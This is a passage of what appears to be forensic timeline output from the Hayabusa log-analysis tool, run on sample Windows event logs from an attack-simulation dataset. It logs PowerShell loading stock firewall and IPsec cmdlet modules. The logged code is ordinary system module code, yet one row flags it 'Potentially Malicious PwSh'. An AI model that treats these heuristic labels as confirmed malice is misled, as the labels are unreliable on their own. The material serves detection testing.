($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and 
config.evtx +2021-04-22 19:19:37.925 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.926 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.927 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.927 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.929 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.930 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.930 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' 
$script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] 
${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
